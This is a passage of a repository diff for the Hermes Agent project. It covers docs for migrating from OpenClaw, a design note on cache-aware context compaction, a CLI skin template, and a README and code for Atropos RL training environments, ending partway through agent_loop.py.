The agent will use the `openclaw-migration` skill to:
1. Run a dry-run first to preview changes
2. Ask about conflict resolution (SOUL.md, skills, etc.)
3. Let you choose between `user-data` and `full` presets
4. Execute the migration with your choices
5. Print a detailed summary of what was migrated
## What Gets Migrated
### `user-data` preset
| Item | Source | Destination |
|------|--------|-------------|
| SOUL.md | `~/.openclaw/workspace/SOUL.md` | `~/.hermes/SOUL.md` |
| Memory entries | `~/.openclaw/workspace/MEMORY.md` | `~/.hermes/memories/MEMORY.md` |
| User profile | `~/.openclaw/workspace/USER.md` | `~/.hermes/memories/USER.md` |
| Skills | `~/.openclaw/workspace/skills/` | `~/.hermes/skills/openclaw-imports/` |
| Command allowlist | `~/.openclaw/workspace/exec_approval_patterns.yaml` | Merged into `~/.hermes/config.yaml` |
| Messaging settings | `~/.openclaw/config.yaml` (TELEGRAM_ALLOWED_USERS, MESSAGING_CWD) | `~/.hermes/.env` |
| TTS assets | `~/.openclaw/workspace/tts/` | `~/.hermes/tts/` |
### `full` preset (adds to `user-data`)
| Item | Source | Destination |
|------|--------|-------------|
| Telegram bot token | `~/.openclaw/config.yaml` | `~/.hermes/.env` |
| OpenRouter API key | `~/.openclaw/.env` or config | `~/.hermes/.env` |
| OpenAI API key | `~/.openclaw/.env` or config | `~/.hermes/.env` |
| Anthropic API key | `~/.openclaw/.env` or config | `~/.hermes/.env` |
| ElevenLabs API key | `~/.openclaw/.env` or config | `~/.hermes/.env` |
Only the allowlisted secrets listed above are ever imported. Other credentials are skipped and reported.
## Conflict Handling
By default, the migration **will not overwrite** existing Hermes data:
- **SOUL.md** — skipped if one already exists in `~/.hermes/`
- **Memory entries** — skipped if memories already exist (to avoid duplicates)
- **Skills** — skipped if a skill with the same name already exists
- **API keys** — skipped if the key is already set in `~/.hermes/.env`
To overwrite conflicts, use `--overwrite`. The migration creates backups before overwriting.
For skills, you can also use `--skill-conflict rename` to import conflicting skills under a new name (e.g., `skill-name-imported`).
## Migration Report
Every migration (including dry runs) produces a report showing:
- **Migrated items** — what was successfully imported
- **Conflicts** — items skipped because they already exist
- **Skipped items** — items not found in the source
- **Errors** — items that failed to import
For execute runs, the full report is saved to `~/.hermes/migration/openclaw/<timestamp>/`.
## Troubleshooting
### "OpenClaw directory not found"
The migration looks for `~/.openclaw` by default. If your OpenClaw is installed elsewhere, use `--source`:
```bash
hermes claw migrate --source /path/to/.openclaw
```
### "Migration script not found"
The migration script ships with Hermes Agent. If you installed via pip (not git clone), the `optional-skills/` directory may not be present. Install the skill from the Skills Hub:
```bash
hermes skills install openclaw-migration
```
### Memory overflow
If your OpenClaw MEMORY.md or USER.md exceeds Hermes' character limits, excess entries are exported to an overflow file in the migration report directory. You can manually review and add the most important ones.


@@ -0,0 +1,192 @@
# Cache-Aware Context Compaction Design Note
> For Hermes: this note is a design/implementation sketch for revisiting prune-first compaction without optimizing token spend at the expense of prompt-cache stability.
Goal: reduce compression cost while keeping cache-break frequency as low as possible.
Architecture: keep Hermes' current invariant that conversation history is only mutated during context compression, then make prune-first compaction conservative enough that it only short-circuits when it buys meaningful runway. If pruning only gets us barely below threshold, fall through to the existing summary compaction immediately.
Tech Stack: `agent/context_compressor.py`, existing `call_llm()`-based summary path, pytest coverage in `tests/agent/test_context_compressor.py`.
---
## 1. Baseline behavior on current main
Today Hermes behaves like this:
1. Prompt crosses the compression threshold.
2. We mutate transcript history once by summarizing the middle region with an LLM.
3. We preserve role alternation and tool-call/tool-result integrity.
4. We continue the conversation from the compressed transcript.
This is expensive in two ways:
- an auxiliary summary call is often required
- the entire compressed middle region is rewritten even when the real problem was just a few huge old tool outputs
But it has one strong cache property:
- it tends to reclaim a lot of headroom per compression event, so the next compression is usually farther away
---
## 2. Why naive prune-first compaction is not enough
A naive prune-first policy says:
- prune old tool outputs
- if prompt is now below threshold, stop
This improves per-event token cost, but it can hurt cache economics:
- prune-only may reclaim less headroom than full compaction
- smaller headroom means the next compression may happen sooner
- each compression event is still a cache-breaking transcript mutation
So there is a real failure mode:
- fewer tokens per compression
- more compression events overall
- worse cache break cadence
That is exactly the tradeoff we want to avoid.
---
## 3. Cache-aware principle
Prune-first compaction should only short-circuit when it buys real runway, not when it merely dips under threshold.
Rule of thumb:
- compression frequency matters as much as compression size
- a smaller mutation is not automatically cheaper if it causes another mutation a few turns later
So the design target is:
- fewer auxiliary summary calls
- without materially increasing compression frequency
---
## 4. Conservative prototype policy
The conservative prototype keeps all existing compression invariants and only changes the acceptance rule for prune-only compaction.
### Phase 1: prune old middle tool outputs
Only prune tool outputs that are:
- in the compressible middle region
- not in protected head/tail windows
- not from protected tools (`read_file`, `memory`, `clarify`, `skill_view`, `todo`)
### Phase 2: require a low-water mark
Do not accept prune-only just because it lands below threshold.
Instead require:
- `post_prune_tokens <= prune_target_tokens`
Where:
- `prune_runway_tokens = max(prune_minimum_tokens, 15% of threshold_tokens)`
- `prune_target_tokens = threshold_tokens - prune_runway_tokens`
Interpretation:
- pruning must get us comfortably below threshold
- otherwise we immediately fall through to normal LLM summary compaction
Why this helps:
- protects cache by avoiding "micro-compactions" that would be followed by another compression shortly after
- still avoids the summary call when pruning truly buys useful runway
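A worked example with illustrative numbers: suppose `threshold_tokens = 100_000` and `prune_minimum_tokens = 8_000`. Then `prune_runway_tokens = max(8_000, 15_000) = 15_000` and `prune_target_tokens = 85_000`. A prune pass that lands at 97_000 tokens is below threshold but above the target, so it falls through to summary compaction; a pass that lands at 82_000 is accepted as prune-only.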
---
## 5. What the prototype currently does
The prototype branch currently:
- keeps prune-first compaction
- adds the low-water / runway requirement above
- preserves current main behavior for summary role alternation
- preserves the centralized `call_llm()` summary path
- keeps head/tail and tool-call/result integrity handling unchanged
This means the branch is no longer optimizing only for token reduction per event; it is explicitly biased toward fewer compression events.
---
## 6. Metrics we should evaluate before merging any future version
A serious cache-aware review should measure all of these, not just token savings:
1. Compression events per 100 conversation turns
2. Average turns between compressions
3. Auxiliary summary calls per session
4. Average tokens reclaimed per compression event
5. Total prompt+auxiliary tokens spent over a long session
6. Earliest changed message index during compression
7. Ratio of prune-only compressions to full summary compressions
The most important comparison is:
- baseline main vs conservative prune-first
Success is not:
- "fewer tokens in one compression"
Success is:
- "equal or better total session cost without increasing compression/cache-break cadence in a meaningful way"
---
## 7. Better long-term directions
If we want a stronger cache story than conservative prune-first, these are the real next-step options:
### A. Insertion-time trimming
Best cache-preserving option.
Idea:
- trim or summarize giant tool outputs before they become durable transcript history
- keep a compact representation from the start instead of mutating history later
Pros:
- avoids later cache-breaking rewrites for those blobs
- makes transcript size stable earlier
Cons:
- more invasive design change
- requires careful UX and provenance handling
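As a hypothetical sketch of the idea (nothing like this exists in the codebase yet; the cap is arbitrary):
```python
MAX_TOOL_OUTPUT_CHARS = 8000  # arbitrary illustrative cap


def trim_at_insertion(output: str, cap: int = MAX_TOOL_OUTPUT_CHARS) -> str:
    """Keep the head and tail of an oversized tool output so the full blob
    never enters durable transcript history in the first place."""
    if len(output) <= cap:
        return output
    half = cap // 2
    omitted = len(output) - cap
    return (
        f"{output[:half]}\n"
        f"... [{omitted} chars trimmed at insertion time] ...\n"
        f"{output[-half:]}"
    )
```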
### B. Provider/backend-aware compaction policy
Different providers may reward:
- preserving a longer stable prefix
- or simply reducing total prompt size
We may eventually want backend-specific heuristics for:
- prune runway targets
- compression thresholds
- when to prefer summary vs pruning
### C. Explicit compression telemetry
If compression remains a core feature, `ContextCompressor` should expose enough telemetry to understand real-world cadence:
- prune-only count
- full summary count
- average recovered tokens
- last compression mode
This is not required for the conservative prototype, but it would make future tuning much easier.
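As a sketch of the shape this telemetry could take (field and method names are illustrative, not an existing interface):
```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class CompressionTelemetry:
    prune_only_count: int = 0
    full_summary_count: int = 0
    recovered_tokens: List[int] = field(default_factory=list)
    last_mode: Optional[str] = None  # "prune" or "summary"

    def record(self, mode: str, recovered: int) -> None:
        if mode == "prune":
            self.prune_only_count += 1
        else:
            self.full_summary_count += 1
        self.recovered_tokens.append(recovered)
        self.last_mode = mode

    @property
    def avg_recovered_tokens(self) -> float:
        if not self.recovered_tokens:
            return 0.0
        return sum(self.recovered_tokens) / len(self.recovered_tokens)
```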
---
## 8. Recommended next steps
1. Keep the conservative prototype local for review.
2. Run targeted tests plus long-session manual trials.
3. If it looks promising, add telemetry before opening another PR.
4. If cache stability remains the top priority, pursue insertion-time trimming instead of further read-time pruning tweaks.
---
## 9. Review question for Teknium
The key product question is:
"Should Hermes optimize compression primarily for per-event token cost, or for minimizing the number of transcript mutations over the lifetime of a session?"
This prototype assumes the answer is:
- prioritize fewer transcript mutations unless pruning buys substantial runway.

@@ -0,0 +1,89 @@
# ============================================================================
# Hermes Agent — Example Skin Template
# ============================================================================
#
# Copy this file to ~/.hermes/skins/<name>.yaml to create a custom skin.
# All fields are optional — missing values inherit from the default skin.
# Activate with: /skin <name> or display.skin: <name> in config.yaml
#
# See hermes_cli/skin_engine.py for the full schema reference.
# ============================================================================
# Required: unique skin name (used in /skin command and config)
name: example
description: An example custom skin — copy and modify this template
# ── Colors ──────────────────────────────────────────────────────────────────
# Hex color values for Rich markup. These control the CLI's visual palette.
colors:
  # Banner panel (the startup welcome box)
  banner_border: "#CD7F32"    # Panel border
  banner_title: "#FFD700"     # Panel title text
  banner_accent: "#FFBF00"    # Section headers (Available Tools, Skills, etc.)
  banner_dim: "#B8860B"       # Dim/muted text (separators, model info)
  banner_text: "#FFF8DC"      # Body text (tool names, skill names)

  # UI elements
  ui_accent: "#FFBF00"        # General accent color
  ui_label: "#4dd0e1"         # Labels
  ui_ok: "#4caf50"            # Success indicators
  ui_error: "#ef5350"         # Error indicators
  ui_warn: "#ffa726"          # Warning indicators

  # Input area
  prompt: "#FFF8DC"           # Prompt text color
  input_rule: "#CD7F32"       # Horizontal rule around input

  # Response box
  response_border: "#FFD700"  # Response box border (ANSI color)

  # Session display
  session_label: "#DAA520"    # Session label
  session_border: "#8B8682"   # Session ID dim color

# ── Spinner ─────────────────────────────────────────────────────────────────
# Customize the animated spinner shown during API calls and tool execution.
spinner:
  # Faces shown while waiting for the API response
  waiting_faces:
    - "(。◕‿◕。)"
    - "(◕‿◕✿)"
    - "٩(◕‿◕。)۶"
  # Faces shown during extended thinking/reasoning
  thinking_faces:
    - "(。•́︿•̀。)"
    - "(◔_◔)"
    - "(¬‿¬)"
  # Verbs used in spinner messages (e.g., "pondering your request...")
  thinking_verbs:
    - "pondering"
    - "contemplating"
    - "musing"
    - "ruminating"
  # Optional: left/right decorations around the spinner
  # Each entry is a [left, right] pair. Omit entirely for no wings.
  # wings:
  #   - ["⟪⚔", "⚔⟫"]
  #   - ["⟪▲", "▲⟫"]

# ── Branding ────────────────────────────────────────────────────────────────
# Text strings used throughout the CLI interface.
branding:
  agent_name: "Hermes Agent"                # Banner title, about display
  welcome: "Welcome! Type your message or /help for commands."
  goodbye: "Goodbye! ⚕"                     # Exit message
  response_label: " ⚕ Hermes "              # Response box header label
  prompt_symbol: " "                       # Input prompt symbol
  help_header: "(^_^)? Available Commands"  # /help header text

# ── Tool Output ─────────────────────────────────────────────────────────────
# Character used as the prefix for tool output lines.
# Default is "┊" (thin dotted vertical line). Some alternatives:
#   "╎" (light triple dash vertical)
#   "▏" (left one-eighth block)
#   "│" (box drawing light vertical)
#   "┃" (box drawing heavy vertical)
tool_prefix: "┊"

environments/README.md

@@ -0,0 +1,334 @@
# Hermes-Agent Atropos Environments
This directory contains the integration layer between **hermes-agent's** tool-calling capabilities and the **Atropos** RL training framework. It provides everything needed to run agentic LLMs through multi-turn tool-calling loops, score their output with arbitrary reward functions, and feed results into Atropos for training or evaluation.
## Architecture Overview
```
                    Atropos Framework
                ┌───────────────────────┐
                │       BaseEnv         │  (atroposlib)
                │  - Server management  │
                │  - Worker scheduling  │
                │  - Wandb logging      │
                │  - CLI (serve/process/│
                │    evaluate)          │
                └───────────┬───────────┘
                            │ inherits
                ┌───────────┴───────────┐
                │  HermesAgentBaseEnv   │  hermes_base_env.py
                │  - Terminal backend   │
                │  - Tool resolution    │
                │  - Agent loop         │
                │  - ToolContext        │
                │  - Async patches      │
                └───────────┬───────────┘
                            │ inherits
          ┌─────────────────┼─────────────────┐
          │                 │                 │
   TerminalTestEnv     HermesSweEnv  TerminalBench2EvalEnv
   (stack testing)    (SWE training)  (TB2 benchmark eval)
```
### Inheritance Chain
**BaseEnv** (from `atroposlib`) is the Atropos base class. It provides:
- Server management (OpenAI-compatible API servers, VLLM, SGLang)
- Worker scheduling for parallel rollouts
- Wandb integration for metrics and rollout logging
- CLI interface with three subcommands: `serve`, `process`, `evaluate`
- `evaluate_log()` for saving eval results to JSON + samples.jsonl
**HermesAgentBaseEnv** (`hermes_base_env.py`) extends BaseEnv with hermes-agent specifics:
- Sets `os.environ["TERMINAL_ENV"]` to configure the terminal backend (local, docker, modal, daytona, ssh, singularity)
- Resolves hermes-agent toolsets via `_resolve_tools_for_group()` (calls `get_tool_definitions()` which queries `tools/registry.py`)
- Implements `collect_trajectory()` which runs the full agent loop and computes rewards
- Supports two-phase operation (Phase 1: OpenAI server, Phase 2: VLLM ManagedServer)
- Applies monkey patches for async-safe tool operation at import time
Concrete environments inherit from `HermesAgentBaseEnv` and implement:
- `setup()` -- Load dataset, initialize state
- `get_next_item()` -- Return the next item for rollout
- `format_prompt()` -- Convert a dataset item into the user message
- `compute_reward()` -- Score the rollout using ToolContext
- `evaluate()` -- Periodic evaluation logic
## Core Components
### Agent Loop (`agent_loop.py`)
`HermesAgentLoop` is the reusable multi-turn agent engine. It runs the same pattern as hermes-agent's `run_agent.py`:
1. Send messages + tools to the API via `server.chat_completion()`
2. If the response contains `tool_calls`, execute each one via `handle_function_call()` (which delegates to `tools/registry.py`'s `dispatch()`)
3. Append tool results to the conversation and go back to step 1
4. If the response has no tool_calls, the agent is done
Tool calls are executed in a thread pool (`run_in_executor`) so backends that use `asyncio.run()` internally (Modal, Docker) don't deadlock inside Atropos's event loop.
Returns an `AgentResult` containing the full conversation history, turn count, reasoning content per turn, tool errors, and optional ManagedServer state (for Phase 2).
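A minimal usage sketch, assuming `server` and `tool_schemas` come from the surrounding environment (see `agent_loop.py` for the full constructor):
```python
# Inside an async context (e.g., collect_trajectory):
loop = HermesAgentLoop(
    server=server,                  # anything with a chat_completion() method
    tool_schemas=tool_schemas,      # from get_tool_definitions()
    valid_tool_names={"terminal", "read_file", "write_file"},
    max_turns=30,
    task_id="rollout-1234",
)
result = await loop.run([
    {"role": "system", "content": "You are a terminal agent."},
    {"role": "user", "content": "Create /tmp/hello.txt containing 'hi'."},
])
print(result.turns_used, result.finished_naturally, len(result.tool_errors))
```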
### Tool Context (`tool_context.py`)
`ToolContext` is a per-rollout handle that gives reward/verification functions direct access to **all** hermes-agent tools, scoped to the rollout's `task_id`. The same `task_id` means the terminal/browser session is the SAME one the model used during its rollout -- all state (files, processes, browser tabs) is preserved.
```python
async def compute_reward(self, item, result, ctx: ToolContext):
    # Run tests in the model's terminal sandbox
    test = ctx.terminal("pytest -v")
    if test["exit_code"] == 0:
        return 1.0

    # Check if a file was created
    content = ctx.read_file("/workspace/solution.py")
    if content.get("content"):
        return 0.5

    # Download files locally for verification (binary-safe)
    ctx.download_file("/remote/output.bin", "/local/output.bin")
    return 0.0
```
Available methods:
- **Terminal**: `terminal(command, timeout)` -- run shell commands
- **Files**: `read_file(path)`, `write_file(path, content)`, `search(query, path)`
- **Transfers**: `upload_file()`, `upload_dir()`, `download_file()`, `download_dir()` -- binary-safe file transfers between host and sandbox
- **Web**: `web_search(query)`, `web_extract(urls)`
- **Browser**: `browser_navigate(url)`, `browser_snapshot()`
- **Generic**: `call_tool(name, args)` -- call any hermes-agent tool by name
- **Cleanup**: `cleanup()` -- release all resources (called automatically after `compute_reward`)
### Patches (`patches.py`)
**Problem**: Some hermes-agent tools use `asyncio.run()` internally (e.g., mini-swe-agent's Modal backend via SWE-ReX). This crashes when called from inside Atropos's event loop because `asyncio.run()` cannot be nested.
**Solution**: `patches.py` monkey-patches `SwerexModalEnvironment` to use a dedicated background thread (`_AsyncWorker`) with its own event loop. The calling code sees the same sync interface, but internally the async work happens on a separate thread that doesn't conflict with Atropos's loop.
What gets patched:
- `SwerexModalEnvironment.__init__` -- creates Modal deployment on a background thread
- `SwerexModalEnvironment.execute` -- runs commands on the same background thread
- `SwerexModalEnvironment.stop` -- stops deployment on the background thread
The patches are:
- **Idempotent** -- calling `apply_patches()` multiple times is safe
- **Transparent** -- same interface and behavior, only the internal async execution changes
- **Universal** -- works identically in normal CLI use (no running event loop)
Applied automatically at import time by `hermes_base_env.py`.
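The core of the pattern, sketched in simplified form (the real `_AsyncWorker` in `patches.py` is more involved):
```python
import asyncio
import threading


class _AsyncWorker:
    """Owns a private event loop on a daemon thread so synchronous callers
    can run coroutines without nesting asyncio.run() inside another loop."""

    def __init__(self):
        self._loop = asyncio.new_event_loop()
        self._thread = threading.Thread(target=self._loop.run_forever, daemon=True)
        self._thread.start()

    def run(self, coro):
        # Submit the coroutine to the worker's loop; block until it finishes.
        return asyncio.run_coroutine_threadsafe(coro, self._loop).result()
```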
### Tool Call Parsers (`tool_call_parsers/`)
Client-side parsers that extract structured `tool_calls` from raw model output text. Used in **Phase 2** (VLLM server type) where ManagedServer's `/generate` endpoint returns raw text without tool call parsing.
Each parser is a standalone reimplementation of the corresponding VLLM parser's `extract_tool_calls()` logic. No VLLM dependency -- only standard library (`re`, `json`, `uuid`) and `openai` types.
Available parsers:
- `hermes` -- Hermes/ChatML `<tool_call>` XML format
- `mistral` -- Mistral `[TOOL_CALLS]` format
- `llama3_json` -- Llama 3 JSON tool calling
- `qwen` -- Qwen tool calling format
- `qwen3_coder` -- Qwen3 Coder format
- `deepseek_v3` -- DeepSeek V3 format
- `deepseek_v3_1` -- DeepSeek V3.1 format
- `kimi_k2` -- Kimi K2 format
- `longcat` -- Longcat format
- `glm45` / `glm47` -- GLM model formats
Usage:
```python
from environments.tool_call_parsers import get_parser
parser = get_parser("hermes")
content, tool_calls = parser.parse(raw_model_output)
```
In Phase 1 (OpenAI server type), these parsers are not needed -- the server handles tool call parsing natively.
## Two-Phase Operation
### Phase 1: OpenAI Server (Evaluation / SFT Data Generation)
Uses `server.chat_completion()` with `tools=` parameter. The server (VLLM, SGLang, OpenRouter, OpenAI) handles tool call parsing natively. Returns `ChatCompletion` objects with structured `tool_calls`.
- Good for: evaluation, SFT data generation, testing
- Run with: `serve` (with `run-api`), `process`, or `evaluate` subcommands
- Placeholder tokens are created for the Atropos pipeline
### Phase 2: VLLM ManagedServer (Full RL Training)
Uses ManagedServer for exact token IDs + logprobs via `/generate`. Client-side tool call parser (from `tool_call_parsers/`) reconstructs structured `tool_calls` from raw output.
- Good for: full RL training with GRPO/PPO
- Run with: `serve` subcommand
- Real tokens, masks, and logprobs flow through the pipeline
## Directory Structure
```
environments/
├── README.md                  # This file
├── __init__.py                # Package exports
├── hermes_base_env.py         # Abstract base (HermesAgentBaseEnv)
├── agent_loop.py              # Multi-turn agent engine (HermesAgentLoop)
├── tool_context.py            # Per-rollout tool access for reward functions
├── patches.py                 # Async-safety patches for Modal backend
├── tool_call_parsers/         # Phase 2 client-side parsers
│   ├── __init__.py            # Registry + base class
│   ├── hermes_parser.py
│   ├── mistral_parser.py
│   ├── llama_parser.py
│   ├── qwen_parser.py
│   ├── qwen3_coder_parser.py
│   ├── deepseek_v3_parser.py
│   ├── deepseek_v3_1_parser.py
│   ├── kimi_k2_parser.py
│   ├── longcat_parser.py
│   ├── glm45_parser.py
│   └── glm47_parser.py
├── terminal_test_env/         # Stack validation environment
│   └── terminal_test_env.py
├── hermes_swe_env/            # SWE-bench style training environment
│   └── hermes_swe_env.py
└── benchmarks/                # Evaluation benchmarks
    ├── terminalbench_2/       # 89 terminal tasks, Modal sandboxes
    │   └── terminalbench2_env.py
    ├── tblite/                # 100 calibrated tasks (fast TB2 proxy)
    │   └── tblite_env.py
    └── yc_bench/              # Long-horizon strategic benchmark
        └── yc_bench_env.py
```
## Concrete Environments
### TerminalTestEnv (`terminal_test_env/`)
A self-contained environment with inline tasks (no external dataset needed) for validating the full stack end-to-end. Each task asks the model to create a file at a known path, and the verifier checks the content matches.
```bash
# Serve mode (needs run-api)
run-api
python environments/terminal_test_env/terminal_test_env.py serve
# Process mode (no run-api, saves to JSONL)
python environments/terminal_test_env/terminal_test_env.py process \
    --env.data_path_to_save_groups terminal_test_output.jsonl
```
### HermesSweEnv (`hermes_swe_env/`)
SWE-bench style training environment. The model gets a coding task, uses terminal + file + web tools to solve it, and the reward function runs tests in the same Modal sandbox.
```bash
python environments/hermes_swe_env/hermes_swe_env.py serve \
    --openai.model_name YourModel \
    --env.dataset_name bigcode/humanevalpack \
    --env.terminal_backend modal
```
### TerminalBench2EvalEnv (`benchmarks/terminalbench_2/`)
**Eval-only** environment for the Terminal-Bench 2.0 benchmark (89 tasks). Each task gets a pre-built Docker Hub image, a natural language instruction, and a test suite. The agent uses terminal + file tools to solve the task, then the test suite verifies correctness.
Follows the standard Atropos eval pattern (like GPQA, MMLU, etc.):
- Run via `evaluate` subcommand (no `run-api` needed)
- `setup()` loads the dataset, `evaluate()` runs all tasks
- `rollout_and_score_eval()` handles per-task agent loop + test verification
- Downloads verifier output locally for reliable reward checking (Harbor pattern)
```bash
# Run full benchmark
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
    --openai.model_name anthropic/claude-opus-4.6

# Run subset of tasks
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
    --openai.model_name anthropic/claude-opus-4.6 \
    --env.task_filter fix-git,git-multibranch

# Skip specific tasks
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
    --openai.model_name anthropic/claude-opus-4.6 \
    --env.skip_tasks heavy-task,slow-task
```
## Creating a New Environment
### Training Environment
1. Create a new directory under `environments/`
2. Create your env file inheriting from `HermesAgentBaseEnv`
3. Implement the four abstract methods + `evaluate()`
```python
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig


class MyEnvConfig(HermesAgentEnvConfig):
    pass  # Add custom fields as needed


class MyEnv(HermesAgentBaseEnv):
    name = "my-env"
    env_config_cls = MyEnvConfig

    @classmethod
    def config_init(cls):
        env_config = MyEnvConfig(
            enabled_toolsets=["terminal", "file"],
            terminal_backend="modal",
            # ... other config
        )
        server_configs = [APIServerConfig(...)]
        return env_config, server_configs

    async def setup(self):
        self.dataset = load_dataset(...)
        self.iter = 0

    async def get_next_item(self):
        item = self.dataset[self.iter % len(self.dataset)]
        self.iter += 1
        return item

    def format_prompt(self, item):
        return item["instruction"]

    async def compute_reward(self, item, result, ctx):
        # ctx gives you full tool access to the rollout's sandbox
        test = ctx.terminal("pytest -v")
        return 1.0 if test["exit_code"] == 0 else 0.0

    async def evaluate(self, *args, **kwargs):
        # Periodic evaluation logic
        ...


if __name__ == "__main__":
    MyEnv.cli()
```
### Eval-Only Environment (Benchmark)
For eval benchmarks, follow the pattern in `terminalbench2_env.py`:
1. Create under `environments/benchmarks/your-benchmark/`
2. Inherit from `HermesAgentBaseEnv`
3. Set eval-only config: `eval_handling=STOP_TRAIN`, `steps_per_eval=1`, `total_steps=1`
4. Stub the training methods (`collect_trajectories`, `score`)
5. Implement `rollout_and_score_eval()` and `evaluate()`
6. Run with `evaluate` subcommand
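Sketched as a skeleton (method bodies elided; `terminalbench2_env.py` is the real reference):
```python
from environments.hermes_base_env import HermesAgentBaseEnv


class MyBenchEnv(HermesAgentBaseEnv):
    name = "my-bench"

    async def collect_trajectories(self, *args, **kwargs):
        raise NotImplementedError("eval-only environment")  # stubbed training method

    async def score(self, *args, **kwargs):
        raise NotImplementedError("eval-only environment")  # stubbed training method

    async def rollout_and_score_eval(self, item) -> float:
        """Run the agent loop on one task; return 1.0 (pass) or 0.0 (fail)."""
        ...

    async def evaluate(self, *args, **kwargs):
        """Iterate tasks, aggregate pass rates, log via evaluate_log()."""
        ...
```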
## Key Config Fields
| Field | Description | Default |
|-------|-------------|---------|
| `enabled_toolsets` | Which hermes toolsets to enable | `None` (all) |
| `disabled_toolsets` | Toolsets to disable | `None` |
| `distribution` | Probabilistic toolset distribution name | `None` |
| `max_agent_turns` | Max LLM calls per rollout | `30` |
| `agent_temperature` | Sampling temperature | `1.0` |
| `terminal_backend` | `local`, `docker`, `modal`, `daytona`, `ssh`, `singularity` | `local` |
| `system_prompt` | System message for the agent | `None` |
| `tool_call_parser` | Parser name for Phase 2 | `hermes` |
| `eval_handling` | `STOP_TRAIN`, `LIMIT_TRAIN`, `NONE` | `STOP_TRAIN` |

environments/__init__.py

@@ -0,0 +1,36 @@
"""
Hermes-Agent Atropos Environments
Provides a layered integration between hermes-agent's tool-calling capabilities
and the Atropos RL training framework.
Core layers:
- agent_loop: Reusable multi-turn agent loop with standard OpenAI-spec tool calling
- tool_context: Per-rollout tool access handle for reward/verification functions
- hermes_base_env: Abstract base environment (BaseEnv subclass) for Atropos
- tool_call_parsers: Client-side tool call parser registry for Phase 2 (VLLM /generate)
Concrete environments:
- terminal_test_env/: Simple file-creation tasks for testing the stack
- hermes_swe_env/: SWE-bench style tasks with Modal sandboxes
Benchmarks (eval-only):
- benchmarks/terminalbench_2/: Terminal-Bench 2.0 evaluation
"""
try:
    from environments.agent_loop import AgentResult, HermesAgentLoop
    from environments.tool_context import ToolContext
    from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
except ImportError:
    # atroposlib not installed — environments are unavailable but
    # submodules like tool_call_parsers can still be imported directly.
    pass

__all__ = [
    "AgentResult",
    "HermesAgentLoop",
    "ToolContext",
    "HermesAgentBaseEnv",
    "HermesAgentEnvConfig",
]

environments/agent_loop.py

@@ -0,0 +1,498 @@
"""
HermesAgentLoop -- Reusable Multi-Turn Agent Engine
Runs the hermes-agent tool-calling loop using standard OpenAI-spec tool calling.
Works with any server that returns ChatCompletion objects with tool_calls:
- Phase 1: OpenAI server type (VLLM, SGLang, OpenRouter, OpenAI API)
- Phase 2: ManagedServer with client-side tool call parser
The loop passes tools= and checks response.choices[0].message.tool_calls,
identical to hermes-agent's run_agent.py. Tool execution is dispatched via
handle_function_call() from model_tools.py.
"""
import asyncio
import concurrent.futures
import json
import logging
import os
import uuid
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Set
from model_tools import handle_function_call
# Thread pool for running sync tool calls that internally use asyncio.run()
# (e.g., mini-swe-agent's modal/docker/daytona backends). Running them in a separate
# thread gives them a clean event loop so they don't deadlock inside Atropos's loop.
# Size must be large enough for concurrent eval tasks (e.g., 89 TB2 tasks all
# making tool calls). Too small = thread pool starvation, tasks queue for minutes.
# Resized at runtime by HermesAgentBaseEnv.__init__ via resize_tool_pool().
_tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=128)
logger = logging.getLogger(__name__)


def resize_tool_pool(max_workers: int):
    """
    Replace the global tool executor with a new one of the given size.
    Called by HermesAgentBaseEnv.__init__ based on config.tool_pool_size.
    Safe to call before any tasks are submitted.
    """
    global _tool_executor
    _tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=max_workers)
    logger.info("Tool thread pool resized to %d workers", max_workers)
@dataclass
class ToolError:
    """Record of a tool execution error during the agent loop."""

    turn: int           # Which turn the error occurred on
    tool_name: str      # Which tool was called
    arguments: str      # The arguments passed (truncated)
    error: str          # The error message
    tool_result: str    # The raw result returned to the model


@dataclass
class AgentResult:
    """Result of running the agent loop."""

    # Full conversation history in OpenAI message format
    messages: List[Dict[str, Any]]
    # ManagedServer.get_state() if available (Phase 2), None otherwise
    managed_state: Optional[Dict[str, Any]] = None
    # How many LLM calls were made
    turns_used: int = 0
    # True if model stopped calling tools naturally (vs hitting max_turns)
    finished_naturally: bool = False
    # Extracted reasoning content per turn (from PR #297 helpers)
    reasoning_per_turn: List[Optional[str]] = field(default_factory=list)
    # Tool errors encountered during the loop
    tool_errors: List[ToolError] = field(default_factory=list)
def _extract_reasoning_from_message(message) -> Optional[str]:
    """
    Extract reasoning content from a ChatCompletion message.

    Handles multiple provider formats:
    1. message.reasoning_content field (some providers)
    2. message.reasoning field (some providers)
    3. message.reasoning_details[].text (OpenRouter style)

    Note: <think> block extraction from content is NOT done here -- that's
    handled by the response already in Phase 1 (server does it) or by
    ManagedServer's patch in Phase 2.

    Args:
        message: The assistant message from ChatCompletion response

    Returns:
        Extracted reasoning text, or None if not found
    """
    # Check reasoning_content field (common across providers)
    if hasattr(message, "reasoning_content") and message.reasoning_content:
        return message.reasoning_content
    # Check reasoning field
    if hasattr(message, "reasoning") and message.reasoning:
        return message.reasoning
    # Check reasoning_details (OpenRouter style)
    if hasattr(message, "reasoning_details") and message.reasoning_details:
        for detail in message.reasoning_details:
            if hasattr(detail, "text") and detail.text:
                return detail.text
            if isinstance(detail, dict) and detail.get("text"):
                return detail["text"]
    return None
class HermesAgentLoop:
    """
    Runs hermes-agent's tool-calling loop using standard OpenAI-spec tool calling.

    Same pattern as run_agent.py:
    - Pass tools= to the API
    - Check response.choices[0].message.tool_calls
    - Dispatch via handle_function_call()

    Works identically with any server type -- OpenAI, VLLM, SGLang, OpenRouter,
    or ManagedServer with a parser. The server determines how tool_calls get
    populated on the response.
    """

    def __init__(
        self,
        server,
        tool_schemas: List[Dict[str, Any]],
        valid_tool_names: Set[str],
        max_turns: int = 30,
        task_id: Optional[str] = None,
        temperature: float = 1.0,
        max_tokens: Optional[int] = None,
        extra_body: Optional[Dict[str, Any]] = None,
    ):
        """
        Initialize the agent loop.

        Args:
            server: Server object with chat_completion() method (OpenAIServer,
                ManagedServer, ServerManager, etc.)
            tool_schemas: OpenAI-format tool definitions from get_tool_definitions()
